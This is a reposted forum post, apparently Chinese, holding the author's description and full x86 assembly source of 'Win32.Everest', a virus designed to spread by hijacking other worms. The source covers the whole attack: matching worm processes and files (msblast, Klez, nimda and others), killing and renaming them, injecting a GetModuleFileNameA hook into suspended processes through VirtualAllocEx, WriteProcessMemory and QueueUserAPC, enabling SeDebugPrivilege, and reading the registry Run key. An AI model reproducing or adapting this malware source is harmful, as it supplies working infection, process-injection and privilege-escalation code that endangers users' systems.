[转载]以毒传毒思想与Win32.Everest源码
<p>信息来源: CVC</p><p><span id="post1" style="FONT-SIZE: 12px; COLOR: #000000">[code] Win32.Everest<br /> by pkxp/CVC<br /> <br />lemme introduce my Everest virus, the worlds first virus <br />which spreads via other viruses. The idea came to my head when <br />I was thinking about viruses in 2003. The virus itself is not <br />big,and it's not complicated, I code it just to show something new.<br /><br />Technical details:<br />1. find a known virus <br />2. kill and move it<br />3. run it in suspend mode and hook it's GetModuleNameFileA<br />4. resume it<br />5. if no more known viruses ,continue, else jump 1 <br />6. read data from HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run<br />7. repeat 1,2,3,4,5<br />8. sleep , then jump 1<br />So when thonse viruses spread,what they are spreading is my Everest instead!<br /> pkxp / CVC<br /> <br /><br />.386 <br />.model flat,stdcall <br />option casemap:none <br />include useful.inc <br /><br />.code<br />main: <br /> @pushsz 'Everest'<br /> push FALSE<br /> push NULL<br /> call CreateMutex<br /> call GetLastError <br /> cmp eax , ERROR_ALREADY_EXISTS<br /> jz ExitVirus <br /> call EverestInit <br /><br />PatchFixedVirus: <br /> mov pMem , NULL <br /> @pushsz '\'<br /> push offset szWinPath<br /> push offset FixedVirus<br />call PatchAllVirus<br />push 1000*60*30<br />call Sleep<br />PatchRegRunVirus:<br /> Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE<br /> or eax , eax<br /> jz MainSleep <br /> mov pMem , eax<br /><br /> call ReadRunKey ;read data from run to pMem<br /> push NULL<br /> push NULL <br /> push pMem <br /> call PatchAllVirus ;no prefix<br /> <br /> push MEM_RELEASE <br /> push 0 <br /> push pMem<br /> call VirtualFree <br />MainSleep:<br />push 1000*60*15 <br />call Sleep<br />jmp PatchFixedVirus <br />ExitVirus:<br /> push 1<br /> call ExitProcess<br /><br />;--------------------------------------------------------------<br />EverestInit: <br /> push MAX_PATH<br />push offset szWormPath <br />push 0<br />call GetModuleFileNameA<br /><br />push 50<br />push offset szWinPath <br />call GetWindowsDirectoryA<br /><br />push 50<br />push offset szSysPath <br />call GetSystemDirectoryA<br />call RaisePrivileges <br />call GetAPIz <br /> ret<br /> <br />;---------------------------------------------------------------<br />PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD<br /> LOCAL hProcess : DWORD<br /> LOCAL szVirusPath[128] : BYTE<br /> LOCAL szformatedPath[128]: BYTE<br /> <br /> mov esi , szVirusList<br /> lea edi , szVirusPath<br />PAVLoop: <br /> push esi<br /> push szPrefix2<br /> push szPrefix<br /> @pushsz '%s%s%s'<br /> push edi<br /> call wsprintf <br /> add esp , 20 <br /><br /> mov al , byte ptr[edi]<br /> or al , al<br /> jz PAVExit<br /><br /> lea eax , szformatedPath<br /> push eax<br /> push edi<br /> call formatVirus<br /> <br /> lea eax , szformatedPath<br /> push eax <br /> call OpenNT4_2k_xp_2003Virus<br /> mov hProcess , eax <br /> <br />PAVNextName:<br /> lodsb<br /> or al , al<br /> jnz PAVNextName <br /> mov eax , pMem<br /> .if eax == 0<br /> lodsd <br /> .else <br /> mov eax , offset PatchVirus<br /> .endif <br /><br /> push edi <br /> push hProcess <br /> call eax <br /> <br /> mov al , byte ptr[esi]<br /> or al , al<br /> jnz PAVLoop <br />PAVExit: <br /> ret 12<br />PatchAllVirus ENDP <br /><br />;------------------------------------------------------------------<br />formatVirus PROC pVirusName:DWORD , pformatedName:DWORD<br /> pushad<br /> mov esi , pVirusName<br /> mov edi , pformatedName<br />FVCopy: <br /> lodsb<br /> cmp al , ' '<br /> jz FVEndCopy<br /> or al , al<br /> jz FVEndCopy <br /> stosb<br /> jmp FVCopy<br />FVEndCopy:<br /> xor al , al<br /> stosb<br /> popad<br /> ret 8<br />formatVirus ENDP <br /><br />;------------------------------------------------------------------ <br />FixedVirus: <br /> db 'system32\msblast.exe',0 ;msblast<br /> dd offset PatchVirus<br /> <br /> db 'Videodrv.exe',0 ;Mimail<br /> dd offset PatchVirus<br /> <br /> db 'system32\runouce.exe',0 ;ChineseHack<br /> dd offset PatchVirus<br /> <br /> db 'system32\gone.scr',0 <br /> dd offset PatchVirus<br /> <br /> db 'system32\hfind.exe',0 ;muma<br /> dd offset PatchVirus<br /> <br /> db 'system32\scam32.exe',0 ;sircam<br /> dd offset PatchVirus<br /> <br /> db 'killonce.exe',0 <br /> dd offset PatchVirus<br /> <br /> db 'system32\wins\DLLHOST.exe',0<br /> dd offset PatchVirus<br /> <br /> db 'system32\Ravmond.exe',0 ;Lovgate<br /> dd offset PatchVirus <br /> db 'system32\WinGate.exe',0 <br /> dd offset PatchVirus <br /> db 'system32\WinDriver.exe',0 <br /> dd offset PatchVirus <br /> db 'system32\Winrpc.exe',0 <br /> dd offset PatchVirus <br /> db 'system32\Winhelp.exe',0<br /> dd offset PatchVirus<br /> db 'system32\Iexplore.exe',0 <br /> dd offset PatchVirus <br /> db 'system32\NetServices.exe',0<br /> dd offset PatchVirus <br /> db 'system32\winexe.exe',0<br /> dd offset PatchVirus <br /> <br /> db 'mmc.exe',0 ;nimda<br /> dd offset PatchVirus<br /> <br /> db 'system32\load.exe',0 <br /> dd offset PatchVirus<br /> <br /> db 'system32\wqk.exe',0 ;Klez<br /> dd offset PatchVirus<br /> db 'system32\krn132.exe',0<br /> dd offset PatchVirus <br /> <br /> <br /> db 'ParticularViruses',0<br /> dd offset ParticularVirus<br /> db 0 ;End of virus list <br /> <br />;-------------------------------------------------------------------<br />OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD<br /> LOCAL hProcess : DWORD<br /> LOCAL hMods : DWORD <br /> LOCAL szProcessName[MAX_PATH] : BYTE <br /> LOCAL ProcessIds[128+1] : DWORD<br /> <br /> pushad <br /> push szVirusName <br /> push offset szWormPath<br /> call lstrcmpi<br /> jz OVFailExit<br /> <br /> lea esi , ProcessIds <br /> push (128+1)*4 <br /> push esi<br />call RtlZeroMemory <br />push offset tmp<br />push 128*4 ;*4<br />push esi<br /> moveax,12345678h<br />_EnumProcesses = dword ptr $-4<br />call eax ;enumerate all running processes<br />dec eax<br />jne OVFailExit<br />add esi,4 ;esi->ProcessIDs[128]<br />ProcessSearch:<br /> lodsd ;get PID<br /> or eax , eax<br /> jz OVFailExit<br /> <br /> push eax <br /> push FALSE<br /> push PROCESS_ALL_ACCESS<br /> call OpenProcess<br /> or eax , eax<br /> jz ProcessSearch <br /> mov hProcess , eax<br /><br /> lea eax , hMods <br /> push offset tmp<br /> push 4<br /> push eax<br /> push hProcess<br /> mov eax , 12345678h<br />_EnumProcessModules = dword ptr $-4<br /> call eax <br /> or eax , eax<br /> jz OVClose<br /> <br /> lea edi , szProcessName<br /> push MAX_PATH<br /> push edi<br /> push hMods<br /> push hProcess<br /> mov eax , 12345678h<br />_GetModuleFileNameEx = dword ptr $-4<br /> call eax <br /> or eax , eax<br /> jz OVClose<br /> <br />IsVirus: <br /> <br /> push szVirusName<br /> push edi <br /> call lstrcmpi<br /> jz OVSucExit<br />OVClose: <br /> push hProcess<br /> call CloseHandle <br /> jmp ProcessSearch<br /> <br />OVFailExit: <br /> popad<br /> xor eax , eax<br /> ret 4 <br />OVSucExit: <br /> popad <br /> mov eax , hProcess <br /> ret 4<br />OpenNT4_2k_xp_2003Virus ENDP <br /><br />;---------------------------------------------------------------<br />PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD<br /> LOCAL szDestPath[128] : BYTE<br /> LOCAL szformatedPath[128]: BYTE<br /> <br /> pushad <br /> mov eax , hProcess<br /> or eax , eax<br /> jz PVMoveVirus <br /> push 0<br /> push hProcess<br /> call TerminateProcess <br /> push INFINITE<br /> push hProcess<br /> call WaitForSingleObject <br /> <br /> push hProcess<br /> call CloseHandle <br />PVMoveVirus: <br /> lea esi , szformatedPath<br /> push esi<br /> push szVirusPath<br /> call formatVirus<br /> <br /> lea edi , szDestPath<br /> push esi<br /> push edi<br /> call lstrcpy<br /><br /> @pushsz '.scr'<br /> push edi <br /> call lstrcat<br /> <br /> push edi<br /> push esi<br /> call MoveFile <br /><br /> push esi<br /> call lstrlen <br /> <br /> mov esi , szVirusPath<br /> add esi , eax <br /> push esi<br /> push edi<br /> call lstrcat<br /><br /> push edi<br /> call StartVirus<br /> popad<br /> ret 8<br />PatchVirus ENDP <br /><br />;-------------------------------------------------------------------<br />ParticularVirus:<br /> ret 8<br /> <br />;------------------------------------------------------------------- <br />StartVirus PROC szVirusPath : DWORD <br /> LOCAL sio : STARTUPINFO<br />LOCAL pi : PROCESS_INformATION<br />LOCAL cbWritten : DWORD<br /><br /> pushad <br /> push sizeof(STARTUPINFO)<br /> lea eax , sio<br /> push eax<br /> call RtlZeroMemory<br /> mov sio.cb , sizeof STARTUPINFO<br /> mov sio.wShowWindow , SW_HIDE<br /> mov sio.dwFlags , STARTF_USESHOWWINDOW<br /> <br /> lea eax , pi<br /> push eax<br /> lea eax , sio<br /> push eax<br /> push NULL <br /> push NULL <br /> push CREATE_SUSPENDED<br /> push TRUE<br /> push NULL <br /> push NULL <br /> push szVirusPath<br /> push NULL<br /> call CreateProcess<br /> or eax , eax<br />jzSVExit<br /><br /> push 3000<br /> call Sleep<br /> <br /> pushPAGE_EXECUTE_READWRITE <br />pushMEM_RESERVE or MEM_COMMIT<br />pushRemoteCodeEnd - RemoteCodeStart<br />push0<br />push pi.hProcess<br />call VirtualAllocEx <br />or eax , eax<br />jzSVFail<br />mov esi , eax<br /><br />add eax , NewGetModuleFileName - RemoteCodeStart<br />mov _NewGetModuleFileNameA , eax<br /> <br /> lea eax , cbWritten<br /> push eax<br /> push RemoteCodeEnd - RemoteCodeStart<br /> push offset RemoteCodeStart<br /> push esi <br /> push pi.hProcess<br /> call WriteProcessMemory <br /> or eax , eax<br />jzSVFail<br /><br /> push NULL<br /> push pi.hThread<br /> push esi <br /> call QueueUserAPC<br /> or eax , eax<br />jzSVFail<br /> <br /> push pi.hThread<br /> call ResumeThread <br />SVFail:<br /> push pi.hThread<br /> call CloseHandle<br /> push pi.hProcess<br /> call CloseHandle<br />SVExit: <br /> popad<br /> ret 4<br />StartVirus ENDP<br /><br />;-----------------------------------------------------------------<br />RemoteCodeStart: <br /> mov esi , 12345678h<br />_GetModuleFileNameA = dword ptr $-4 <br /> <br /> @pushsz '123' ;cbWriten <br /> push PAGE_EXECUTE_READWRITE <br /> push 6 ; push & ret<br /> push esi<br /> mov eax , 12345678h<br />_VirtualProtect = dword ptr $-4<br /> call eax<br /> <br /> @pushsz '123' ;cbWriten <br /> push 6<br /> call RCSJump<br /> push 12345678h <br />_NewGetModuleFileNameA = dword ptr $-4 <br /> ret<br />RCSJump:<br /> push esi<br /> push -1<br /> mov eax , 12345678h<br />_WriteProcessMemory = dword ptr $-4<br /> call eax <br /> ret 4 <br /><br />NewGetModuleFileName:<br /> push esi<br /> push edi<br /> mov edi , [esp+16]<br /> call _szWormPath<br />szWormPath db MAX_PATH dup (0)<br />_szWormPath: <br /> pop esi <br /> xor ecx , ecx<br />RCSLoop:<br /> lodsb<br /> stosb<br /> inc ecx <br /> or al , al<br /> jnz RCSLoop <br /> pop edi<br /> pop esi<br /> mov eax , ecx<br /> dec eax<br /> ret 12 <br />RemoteCodeEnd: <br /><br />;-----------------------------------------------------------------<br />GetAPIz:<br /> @pushsz 'Kernel32.dll'<br /> call GetModuleHandle<br /> xchg eax,esi <br /> <br /> @pushsz 'GetModuleFileNameA'<br /> push esi<br /> call GetProcAddress<br /> mov _GetModuleFileNameA,eax <br /> <br /> @pushsz 'VirtualProtect'<br /> push esi<br /> call GetProcAddress<br /> mov _VirtualProtect,eax <br /> <br /> @pushsz 'WriteProcessMemory'<br /> push esi<br /> call GetProcAddress<br /> mov _WriteProcessMemory,eax<br /><br /> @pushsz 'PSAPI'<br /> call LoadLibraryA<br /> xchg eax,esi<br /><br /> @pushsz 'EnumProcesses'<br /> push esi<br /> call GetProcAddress<br /> mov _EnumProcesses,eax <br /> <br /> @pushsz 'EnumProcessModules'<br /> push esi<br /> call GetProcAddress<br /> mov _EnumProcessModules,eax <br /><br /> @pushsz 'GetModuleFileNameExA'<br /> push esi<br /> call GetProcAddress<br /> mov _GetModuleFileNameEx,eax <br /> ret <br /> <br />;---------------Raise Privilege of our process----------------------<br />RaisePrivileges:<br /> call GetCurrentProcess<br /> push offset p_token<br /> push TOKEN_ALL_ACCESS ;DesiredAccess<br /> push eax <br /> call OpenProcessToken ;open token of our process <br /> or eax,eax ;God,I used cmp eax,eax first<br /> jz RPExit<br /><br /> push offset p_luid <br /> @pushsz 'SeDebugPrivilege'<br /> push NULL<br /> call LookupPrivilegevalueA ;find LUID for this priv.<br /> dec eax<br /> jne RPExit<br /> <br /> push 0<br /> call SetLastError<br /> push NULL<br /> push NULL<br /> push NULL<br /> push offset token_priv<br /> push FALSE<br /> push p_token<br /> call AdjustTokenPrivileges<br />RPExit: <br /> ret<br /> token_priv dd 1<br /> p_luid db 8 dup(0)<br /> dd SE_PRIVILEGE_ENABLED<br /> p_token dd 0<br /><br />;------------------------------------------------------------------- <br />ReadRunKey PROC<br /> LOCAL hKey : DWORD<br /> LOCAL dwIndex : DWORD <br /> LOCAL szFilePath[MAX_PATH] : BYTE<br /> LOCAL szvalueName[MAX_PATH] : BYTE<br /> LOCAL dwvalueLen : DWORD<br /> LOCAL dwDataLen : DWORD<br /> LOCAL dwType : DWORD<br /> <br /> pushad <br /> lea eax , hKey<br />push eax<br />push KEY_QUERY_value ;KEY_ALL_ACCESS<br />push 0<br /> @pushsz 'Software\Microsoft\Windows\CurrentVersion\Run' <br />push HKEY_LOCAL_MACHINE<br />call RegOpenKeyEx<br />cmp eax , ERROR_SUCCESS<br />jnz RRKExit <br /><br />push 0<br />pop dwIndex<br />push pMem<br />pop edi<br /><br />RRKLoop: <br />push MAX_PATH<br />pop dwDataLen<br />push MAX_PATH<br />pop dwvalueLen<br /> lea eax , dwDataLen<br /> push eax <br /> lea esi , szFilePath<br /> push esi<br /> lea eax , dwType<br /> push eax<br /> push NULL<br /> lea eax , dwvalueLen<br /> push eax <br /> lea eax , szvalueName<br /> push eax <br /> push dwIndex<br /> push hKey<br /> call RegEnumvalue<br /> cmp eax , ERROR_SUCCESS<br /> jnz RRKClose<br /> <br /> push edi <br /> mov edi , esi<br /> push edi<br /> call lstrlen<br /> mov ecx , eax<br /> mov al , '\'<br /> repnz scasb<br /> pop edi<br /> jz RRRKReplace<br /> <br /> push esi<br /> @pushsz '\' <br /> push offset szWinPath<br /> @pushsz '%s%s%s'<br /> push edi<br /> call wsprintf <br /> add esp , 20 <br /> <br /> push edi<br /> call lstrlen <br /> add edi , eax <br /> xor al , al<br /> stosb<br /> <br /> push esi<br /> @pushsz '\' <br /> push offset szSysPath<br /> @pushsz '%s%s%s'<br /> push edi<br /> call wsprintf <br /> add esp , 20 <br /> jmp RRKNext <br /> <br />RRRKReplace: <br /> push esi <br /> call ReplaceFilePath<br /><br /> push esi <br /> push edi<br /> call lstrcpy<br />RRKNext: <br /> push edi<br /> call lstrlen <br /> add edi , eax <br /> xor al , al<br /> stosb<br /> inc dwIndex<br /> jmp RRKLoop <br />RRKClose: <br /><br /> push hKey<br /> call RegCloseKey <br />RRKExit: <br /> xor al , al<br /> stosb <br /> popad <br /> ret<br />ReadRunKey ENDP<br /><br />;------------------------------------------------------------------<br />ReplaceFilePath PROC szFilePath : DWORD<br /> LOCAL s[MAX_PATH] : BYTE <br /> pushad <br /> push szFilePath<br /> lea edi , s<br /> push edi<br /> call lstrcpy <br />IsSysDir: <br /> push 8<br /> pop ecx<br /> @pushsz '%system%' ;len=8<br /> pop esi<br /> repz cmpsb<br /> jne IsWinDir<br /> <br /> push offset szSysPath<br /> push szFilePath<br /> call lstrcpy <br /> jmp RFPCat<br />IsWinDir: <br /> push 8<br /> pop ecx<br /> @pushsz '%windir%' ;len=8<br /> pop esi<br /> lea edi , s <br /> repz cmpsb<br /> jne RFPExit<br /> <br /> push offset szWinPath<br /> push szFilePath<br /> call lstrcpy <br />RFPCat: <br /> push edi<br /> push szFilePath<br /> call lstrcat <br />RFPExit: <br /> popad<br /> ret 4<br />ReplaceFilePath ENDP <br /><br />Signature db 'Win32.Everest by PKXP/CVC, made in China.',0<br />szWinPath db 50 dup (0)<br />szSysPath db 50 dup (0)<br />tmp dd ? <br />pMem dd 0<br /><br />VEnd: <br />end main<br />[/code]</span></p>页:
[1]